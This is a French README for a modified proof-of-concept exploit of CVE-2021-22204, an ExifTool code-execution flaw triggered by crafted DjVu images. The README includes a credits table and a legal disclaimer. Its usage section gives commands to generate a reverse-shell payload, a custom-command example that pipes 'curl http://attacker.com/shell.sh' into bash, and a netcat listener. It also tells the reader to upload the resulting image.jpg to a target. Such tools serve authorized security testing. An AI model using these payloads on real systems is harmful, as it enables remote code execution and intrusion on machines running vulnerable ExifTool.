
Exploit RCE pour ExifTool (CVE-2021-22204) - version améliorée, sans dépendance à exiftool
Une preuve de concept améliorée pour CVE-2021-22204, une vulnérabilité dans les versions 7.44 à 12.23 d'ExifTool qui permet l'exécution de code arbitraire lors du traitement de fichiers DjVu malveillants.
Ceci est un travail dérivé. La vulnérabilité et l'exploit original ne sont pas de moi.
| Rôle | Qui |
|---|
| Vulnérabilité découverte par | William Bowling (@wcbowling), signalée via le programme de bug bounty GitLab — avril 2021 |
| PoC original par | UNICORD (NicPWNs & Dev-Yeoj) |
| Modifications dans ce dépôt par | d4ytox |
Une neutralisation inappropriée des données utilisateur dans le format de fichier DjVu dans les versions 7.44 à 12.23 d'ExifTool permet l'exécution de code arbitraire lors de l'analyse d'une image malveillante. Cet exploit génère un fichier image malveillant qui, lorsqu'il est traité par une version vulnérable d'ExifTool, exécute du code contrôlé par l'attaquant.
En s'appuyant sur UNICORDev/exploit-CVE-2021-22204 :
exiftool -config pour intégrer la charge utile, ce qui échoue si votre propre ExifTool est corrigé (v12.24+). Cette version construit une charge utile DjVu pure en utilisant uniquement djvumake.\c)djvulibre-binCe sont des modifications d'ingénierie apportées à un exploit existant. Aucune recherche de vulnérabilité n'est revendiquée.
sudo apt install djvulibre-bin
Reverse Shell :
python3 exploit.py -s <LHOST> <LPORT>
Commande personnalisée :
python3 exploit.py -c "id > /tmp/pwned"
Exemples :
# Générer une charge utile reverse shell
python3 exploit.py -s 192.168.1.100 4444
# Générer une charge utile d'exécution de commande
python3 exploit.py -c "curl http://attacker.com/shell.sh | bash"
# Démarrer un écouteur et attendre la connexion
nc -nlvp 4444
L'exploit génère image.jpg - téléversez ce fichier sur une cible où ExifTool le traitera.
Cet outil est fourni uniquement à des fins éducatives et de tests de sécurité autorisés.
L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage causé par cet outil. N'utilisez cet exploit que contre des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation écrite explicite de test.
L'accès non autorisé à des systèmes informatiques est illégal et puni par la loi. Utilisez cet outil de manière responsable.
MIT, s'appliquant uniquement aux modifications de ce dépôt. Le PoC en amont ne comporte aucune licence, il reste donc tous droits réservés à ses auteurs. Voir LICENSE pour l'avis d'attribution complet.